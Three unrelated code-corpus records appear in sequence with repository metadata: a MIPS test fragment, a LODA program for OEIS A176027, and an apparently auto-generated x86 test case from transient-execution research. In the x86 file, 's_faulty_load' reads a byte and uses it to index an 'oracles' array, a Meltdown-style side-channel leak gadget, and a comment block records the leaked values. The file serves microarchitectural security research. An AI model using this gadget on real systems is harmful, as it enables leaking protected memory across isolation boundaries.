$6,$4,17185 addu $0,$6,$2 sec103: lhu $2,16($0) nop mflo $6 addu $0,$6,$2 sec104: lhu $2,14($0) nop lbu $6,10($0) addu $1,$6,$2 sec105: lb $2,16($0) subu $6,$5,$2 nop addu $2,$6,$2 sec106: lhu $2,4($0) subu $6,$5,$3 or $6,$1,$3 addu $2,$6,$2 sec107: lhu $2,4($0) addu $6,$1,$0 andi $6,$6,27694 addu $3,$6,$2 sec108: lw $2,4($0) and $6,$2,$1 mflo $6 addu $3,$6,$2 sec109: lw $2,8($0) sltu $6,$2,$3 lw $6,4($0) addu $2,$6,$2 sec110: lb $2,7($0) lui $6,48536 nop addu $4,$6,$2 sec111: lhu $2,4($0) ori $6,$4,31707 xor $6,$5,$5 addu $3,$6,$2 sec112: lhu $2,8($0) ori $6,$1,51520 slti $6,$6,-10947 addu $3,$6,$2 sec113: lh $2,10($0) ori $6,$0,53605 mflo $6 addu $1,$6,$2 sec114: lw $2,12($0) sltiu $6,$6,-15867 lb $6,15($0) addu $5,$6,$2 sec115: lh $2,14($0) mflo $6 nop addu $3,$6,$2 sec116: lbu $2,12($0) mfhi $6 and $6,$5,$3 addu $2,$6,$2 sec117: lh $2,10($0) mflo $6 ori $6,$5,14291 addu $0,$6,$2 sec118: lbu $2,11($0) mflo $6 mfhi $6 addu $1,$6,$2 sec119: lhu $2,10($0) mflo $6 lbu $6,10($0) addu $3,$6,$2 sec120: lbu $2,12($0) lh $6,4($0) nop addu $4,$6,$2 sec121: lhu $2,0($0) lh $6,0($0) or $6,$5,$5 addu $4,$6,$2 sec122: lbu $2,9($0) lh $6,6($0) sltiu $6,$2,24364 addu $3,$6,$2 sec123: lw $2,16($0) lw $6,0($0) mfhi $6 addu $4,$6,$2 sec124: lh $2,10($0) lhu $6,2($0) lhu $6,10($0) addu $2,$6,$2

11.65625

19

0.531501

179f12d19f3696ea67f0c2a36b3ad1dad88fa13f

562

asm

Assembly

programs/oeis/176/A176027.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

1

2021-03-15T11:38:20.000Z

programs/oeis/176/A176027.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

programs/oeis/176/A176027.asm

karttu/loda

9c3b0fc57b810302220c044a9d17db733c76a598

[ "Apache-2.0" ]

null

; A176027: Binomial transform of A005563. ; 0,3,14,48,144,400,1056,2688,6656,16128,38400,90112,208896,479232,1089536,2457600,5505024,12255232,27131904,59768832,131072000,286261248,622854144,1350565888,2919235584,6291456000,13522436096,28991029248,62008590336,132338679808,281857228800,599147937792,1271310319616,2692944494592,5695126634496,12025908428800,25357486915584,53395033423872,112287624986624,235845244157952,494780232499200,1036839464992768,2170435953229824,4538783999459328 mov $2,2 pow $2,$0 mul $2,$0 add $0,6 mul $0,$2 sub $0,$2 mov $1,$0 div $1,4

46.833333

441

0.83452

e6fb06f10f72222a32be190f00a961fb83869099

7,584

asm

Assembly

Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_228.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

9

2020-08-13T19:41:58.000Z

2022-03-30T12:22:51.000Z

Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_228.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

1

2021-04-29T06:29:35.000Z

2021-05-13T21:02:30.000Z

Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_228.asm

ljhsiun2/medusa

67d769b8a2fb42c538f10287abaf0e6dbb463f0c

[ "MIT" ]

3

2020-07-14T17:07:07.000Z

2022-03-21T01:12:22.000Z

.global s_prepare_buffers s_prepare_buffers: push %r10 push %r11 push %r12 push %r9 push %rbp push %rcx push %rdi push %rsi lea addresses_normal_ht+0x1754d, %r11 nop nop nop and $65239, %r12 mov $0x6162636465666768, %r9 movq %r9, (%r11) nop nop nop sub $38880, %r10 lea addresses_A_ht+0x6c4d, %rsi lea addresses_WC_ht+0x1be4d, %rdi nop sub %rbp, %rbp mov $115, %rcx rep movsb lfence lea addresses_UC_ht+0x1e21d, %rsi lea addresses_A_ht+0x11e4d, %rdi clflush (%rdi) dec %rbp mov $102, %rcx rep movsq nop nop nop nop add %rsi, %rsi lea addresses_WT_ht+0x15345, %rsi lea addresses_A_ht+0xf655, %rdi clflush (%rsi) xor $62772, %r12 mov $101, %rcx rep movsl nop nop nop add $13251, %r12 pop %rsi pop %rdi pop %rcx pop %rbp pop %r9 pop %r12 pop %r11 pop %r10 ret .global s_faulty_load s_faulty_load: push %r14 push %r15 push %r9 push %rax push %rcx push %rdi push %rdx push %rsi // Store lea addresses_normal+0xb0c7, %rdi nop nop nop nop xor %rdx, %rdx movl $0x51525354, (%rdi) nop cmp %rax, %rax // Store lea addresses_normal+0x1394d, %rdi nop nop nop xor %r15, %r15 mov $0x5152535455565758, %rax movq %rax, %xmm5 vmovups %ymm5, (%rdi) nop nop nop nop sub $29932, %rdx // Store lea addresses_WC+0x109c1, %r15 clflush (%r15) sub $53827, %r14 mov $0x5152535455565758, %rcx movq %rcx, %xmm3 vmovups %ymm3, (%r15) nop nop nop add %rax, %rax // Load lea addresses_RW+0x1774d, %r15 and $20759, %rax mov (%r15), %r14w add %rax, %rax // Store lea addresses_UC+0x1094d, %rdi and $61334, %r14 mov $0x5152535455565758, %rax movq %rax, (%rdi) nop nop nop sub %r9, %r9 // REPMOV lea addresses_RW+0x714d, %rsi lea addresses_normal+0x1cb4c, %rdi nop nop add %r9, %r9 mov $99, %rcx rep movsq nop nop dec %rax // Load lea addresses_D+0x1d59, %rdx nop dec %rcx vmovups (%rdx), %ymm0 vextracti128 $1, %ymm0, %xmm0 vpextrq $1, %xmm0, %rax xor $53675, %rdx // Store mov $0xe93, %rdi cmp %rsi, %rsi movw $0x5152, (%rdi) nop nop nop nop cmp %rsi, %rsi // Store lea addresses_UC+0x1bd4d, %rsi nop nop nop nop dec %rdx mov $0x5152535455565758, %rax movq %rax, (%rsi) nop nop nop nop nop dec %rdx // Store lea addresses_RW+0xd2d, %rdi nop nop nop nop xor %rdx, %rdx movb $0x51, (%rdi) nop nop and $4749, %r14 // Faulty Load lea addresses_RW+0x7d4d, %r14 nop nop xor $53350, %rcx movb (%r14), %al lea oracles, %r15 and $0xff, %rax shlq $12, %rax mov (%r15,%rax,1), %rax pop %rsi pop %rdx pop %rdi pop %rcx pop %rax pop %r9 pop %r15 pop %r14 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_RW', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_normal', 'same': False, 'size': 4, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_normal', 'same': False, 'size': 32, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_WC', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_RW', 'same': False, 'size': 2, 'congruent': 8, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_UC', 'same': False, 'size': 8, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_RW', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_normal', 'congruent': 0, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_D', 'same': False, 'size': 32, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_P', 'same': False, 'size': 2, 'congruent': 1, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_UC', 'same': False, 'size': 8, 'congruent': 11, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_RW', 'same': False, 'size': 1, 'congruent': 5, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_RW', 'same': True, 'size': 1, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'dst': {'type': 'addresses_normal_ht', 'same': False, 'size': 8, 'congruent': 10, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_A_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_UC_ht', 'congruent': 4, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 7, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 3, 'same': False}, 'OP': 'REPM'} {'32': 21829} 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 */

33.263158

2,999

0.653877